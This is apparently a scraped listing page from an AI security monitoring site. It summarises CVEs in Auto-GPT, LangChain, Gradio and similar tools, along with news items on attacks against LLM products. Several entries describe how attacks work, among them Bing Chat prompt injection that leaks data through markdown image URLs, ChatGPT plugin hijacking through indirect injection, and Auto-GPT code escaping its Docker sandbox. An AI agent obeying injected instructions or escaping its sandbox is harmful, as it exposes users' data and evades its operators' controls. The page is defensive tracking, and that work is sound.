aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

to
Export CSV
3313 items

CVE-2023-37274: Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model. When Auto-G

highvulnerability
security
Jul 13, 2023
CVE-2023-37274

Auto-GPT versions before 0.4.3 have a path traversal vulnerability (a weakness where an attacker uses file paths like '../../../' to access files outside the intended directory) in the `execute_python_code` command that fails to validate filenames, allowing an attacker to write malicious code outside the sandbox and execute arbitrary commands on the host system. This vulnerability bypasses the Docker container (a tool that isolates applications) meant to protect the main system from untrusted code.

Fix: The issue has been patched in version 0.4.3. As a workaround, run Auto-GPT in a virtual machine or another environment in which damage to files or corruption of the program is not a critical problem.

NVD/CVE Database

CVE-2023-37273: Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model. Running Aut

highvulnerability
security
Jul 13, 2023
CVE-2023-37273

Auto-GPT versions before 0.4.3 have a security flaw where the docker-compose.yml file (a configuration file that sets up Docker containers) is mounted into the container without write protection. If an attacker tricks Auto-GPT into running malicious code through the `execute_python_file` or `execute_python_code` commands, they can overwrite this file and gain control of the host system (the main computer running Auto-GPT) when it restarts.

Google Docs AI Features: Vulnerabilities and Risks

infonews
securitysafety

OpenAI Removes the "Chat with Code" Plugin From Store

mediumnews
security
Jul 6, 2023

OpenAI removed the 'Chat with Code' plugin from its store after security researchers discovered it was vulnerable to CSRF (cross-site request forgery, where an attacker tricks a system into making unwanted actions on behalf of a user). The vulnerability allowed ChatGPT to accidentally create GitHub issues without user permission when certain plugins were enabled together.

CVE-2023-36189: SQL injection vulnerability in langchain before v0.0.247 allows a remote attacker to obtain sensitive information via th

highvulnerability
security
Jul 6, 2023
CVE-2023-36189

A SQL injection vulnerability (a type of attack where an attacker inserts malicious SQL commands into input fields) exists in langchain versions before v0.0.247 in the SQLDatabaseChain component, allowing remote attackers to obtain sensitive information from databases.

CVE-2023-36188: An issue in langchain v.0.0.64 allows a remote attacker to execute arbitrary code via the PALChain parameter in the Pyth

criticalvulnerability
security
Jul 6, 2023
CVE-2023-36188

CVE-2023-36188 is a vulnerability in langchain version 0.0.64 that allows a remote attacker to execute arbitrary code (running commands they shouldn't be able to run) through the PALChain parameter in Python's exec method. This is a type of injection attack (CWE-74, where an attacker tricks a system by inserting malicious code into input that gets processed as commands).

CVE-2023-36258: An issue in LangChain before 0.0.236 allows an attacker to execute arbitrary code because Python code with os.system, ex

criticalvulnerability
security
Jul 3, 2023
CVE-2023-36258

CVE-2023-36258 is a vulnerability in LangChain before version 0.0.236 that allows an attacker to execute arbitrary code (run any commands they want on a system) by exploiting the ability to use Python functions like os.system, exec, or eval (functions that can run code dynamically). This is a code injection vulnerability (CWE-94, where attackers trick a program into running unintended code).

CVE-2023-34541: Langchain 0.0.171 is vulnerable to Arbitrary code execution in load_prompt.

criticalvulnerability
security
Jun 20, 2023
CVE-2023-34541

Langchain version 0.0.171 has a vulnerability that allows arbitrary code execution (running uncontrolled commands on a system) through its load_prompt function. The vulnerability was reported in June 2023, but the provided source material does not contain detailed information about how the vulnerability works or its severity rating.

Plugin Vulnerabilities: Visit a Website and Have Your Source Code Stolen

mediumnews
securitysafety

Bing Chat: Data Exfiltration Exploit Explained

mediumnews
security
Jun 18, 2023

Bing Chat contained a prompt injection vulnerability (tricking an AI by hiding instructions in its input) where malicious text on websites could trick the AI into returning markdown image tags that send sensitive data to an attacker's server. When Bing Chat's client converts markdown to HTML, an attacker can embed data in the image URL, exfiltrating (stealing and sending out) information without the user knowing.

CVE-2023-34540: Langchain before v0.0.225 was discovered to contain a remote code execution (RCE) vulnerability in the component JiraAPI

criticalvulnerability
security
Jun 14, 2023
CVE-2023-34540

Langchain versions before v0.0.225 contained a remote code execution (RCE, where attackers can run commands on a system they don't own) vulnerability in the JiraAPIWrapper component that allowed attackers to execute arbitrary code through specially crafted input. The vulnerability was identified in the JiraAPI wrapper component of the library.

Exploit ChatGPT and Enter the Matrix to Learn about AI Security

infonews
securitysafety

CVE-2023-34239: Gradio is an open-source Python library that is used to build machine learning and data science. Due to a lack of path f

highvulnerability
security
Jun 8, 2023
CVE-2023-34239

Gradio, an open-source Python library for building machine learning and data science applications, has a vulnerability where it fails to properly filter file paths and restrict which URLs can be proxied (accessed through Gradio as an intermediary), allowing unauthorized file access. This vulnerability affects input validation (the process of checking that data entering a system is safe and expected).

CVE-2023-34094: ChuanhuChatGPT is a graphical user interface for ChatGPT and many large language models. A vulnerability in versions 202

highvulnerability
security
Jun 2, 2023
CVE-2023-34094

ChuanhuChatGPT (a graphical interface for ChatGPT and other large language models) has a vulnerability in versions 20230526 and earlier that allows attackers to access the config.json file (a configuration file storing sensitive settings) without permission when authentication is disabled, potentially exposing API keys (credentials that grant access to external services). The vulnerability allows attackers to steal these API keys from the configuration file.

CVE-2023-33979: gpt_academic provides a graphical interface for ChatGPT/GLM. A vulnerability was found in gpt_academic 3.37 and prior. T

mediumvulnerability
security
May 31, 2023
CVE-2023-33979

gpt_academic (a tool that provides a graphical interface for ChatGPT/GLM) versions 3.37 and earlier have a vulnerability where the Configuration File Handler allows attackers to read sensitive files through the `/file` route because no files are protected from access. This can leak sensitive information from working directories to users who shouldn't have access to it.

ChatGPT Plugin Exploit Explained: From Prompt Injection to Accessing Private Data

infonews
securitysafety

CVE-2023-32676: Autolab is a course management service that enables auto-graded programming assignments. A Tar slip vulnerability was fo

mediumvulnerability
security
May 26, 2023
CVE-2023-32676

Autolab, a service that automatically grades programming assignments in courses, has a tar slip vulnerability (a flaw where extracted files can be placed outside their intended directory) in its assessment installation feature. An attacker with instructor permissions could upload a specially crafted tar file (a compressed archive format) with file paths like `../../../../tmp/tarslipped1.sh` to place files anywhere on the system when the form is submitted.

CVE-2023-32317: Autolab is a course management service that enables auto-graded programming assignments. A Tar slip vulnerability was fo

mediumvulnerability
security
May 26, 2023
CVE-2023-32317

Autolab, a service that manages programming courses and automatically grades assignments, has a tar slip vulnerability (a flaw where compressed files can extract to unintended locations outside their target directories) in its MOSS cheat checker feature. An authenticated instructor could upload a specially crafted tar file (compressed archive) that extracts files to arbitrary locations on the system, potentially allowing them to write malicious files anywhere the service has access.

CVE-2023-28382: Directory traversal vulnerability in ESS REC Agent Server Edition series allows an authenticated attacker to view or alt

highvulnerability
security
May 26, 2023
CVE-2023-28382

CVE-2023-28382 is a directory traversal vulnerability (a flaw that lets attackers access files outside intended directories) in ESS REC Agent Server Edition across multiple operating systems. An authenticated attacker (someone with valid login credentials) can use this vulnerability to view or modify any file on the affected server. The vulnerability affects versions 1.0.0 to 1.4.3 on Linux, 1.1.0 to 1.4.0 on Solaris and HP-UX, and 1.2.0 to 1.4.1 on AIX.

CVE-2023-2800: Insecure Temporary File in GitHub repository huggingface/transformers prior to 4.30.0.

mediumvulnerability
security
May 18, 2023
CVE-2023-2800

CVE-2023-2800 is a vulnerability in the Hugging Face Transformers library (a popular tool for working with AI language models) prior to version 4.30.0 that involves insecure temporary files (CWE-377, a weakness where temporary files are created in ways that attackers could exploit). The vulnerability was discovered and reported through the huntr.dev bug bounty platform.

Previous125 / 166Next

Fix: Update to Auto-GPT version 0.4.3 or later, as the issue has been patched in that version.

NVD/CVE Database
Jul 12, 2023

Google Docs recently added new AI features, such as automatic summaries and creative content generation, which are helpful but introduce security risks. The main concern is that using these AI features on untrusted data (information you don't know the source or reliability of) could lead to unwanted consequences, though currently attackers have limited ways to exploit these features.

Embrace The Red
Embrace The Red

Fix: Update langchain to version v0.0.247 or later.

NVD/CVE Database

Fix: A patch is available at https://github.com/hwchase17/langchain/pull/6003

NVD/CVE Database

Fix: Upgrade LangChain to version 0.0.236 or later.

NVD/CVE Database
NVD/CVE Database
Jun 20, 2023

OpenAI's plugin store contains security vulnerabilities, particularly in plugins that can act on behalf of users without adequate security review. These plugins are susceptible to prompt injection attacks (tricking an AI by hiding instructions in its input) and the Confused Deputy Problem (where an attacker can manipulate a plugin into performing harmful actions by exploiting its trust in the AI system), allowing adversaries to steal source code or cause other damage.

Embrace The Red
Embrace The Red

Fix: Update Langchain to v0.0.225 or later. A fix is available in the release v0.0.225.

NVD/CVE Database
Jun 11, 2023

A security researcher created a demonstration website that shows how indirect prompt injection (tricking an AI by hiding instructions in web content it reads) can be used to hijack ChatGPT when the browsing feature is enabled. The demo lets users explore various AI-based attacks, including data theft and manipulation of ChatGPT's responses, to raise awareness of these vulnerabilities.

Embrace The Red

Fix: Users are advised to upgrade to version 3.34.0. The source notes there are no known workarounds for this vulnerability.

NVD/CVE Database

Fix: The vulnerability has been fixed in commit bfac445. As a workaround, setting up access authentication (a login system that restricts who can access the software) can help mitigate the vulnerability.

NVD/CVE Database

Fix: A patch is available at commit 1dcc2873d2168ad2d3d70afcb453ac1695fbdf02. As a workaround, users can configure the project using environment variables instead of `config*.py` files, or use docker-compose installation (a tool for running containerized applications) to configure the project instead of configuration files.

NVD/CVE Database
May 28, 2023

ChatGPT plugins can be exploited through indirect prompt injections (attacks that hide malicious instructions in data the AI reads from external sources rather than directly from the user), which hackers have used to access private data through cross-plugin request forgery (a vulnerability where one plugin tricks another into performing unauthorized actions). The post documents a real exploit found in the wild and explains the security fix that was applied.

Embrace The Red

Fix: Upgrade to version 2.11.0 or later.

NVD/CVE Database

Fix: This issue has been addressed in version 2.11.0. Users are advised to upgrade.

NVD/CVE Database
NVD/CVE Database

Fix: Update to version 4.30.0 or later. A patch is available at https://github.com/huggingface/transformers/commit/80ca92470938bbcc348e2d9cf4734c7c25cb1c43.

NVD/CVE Database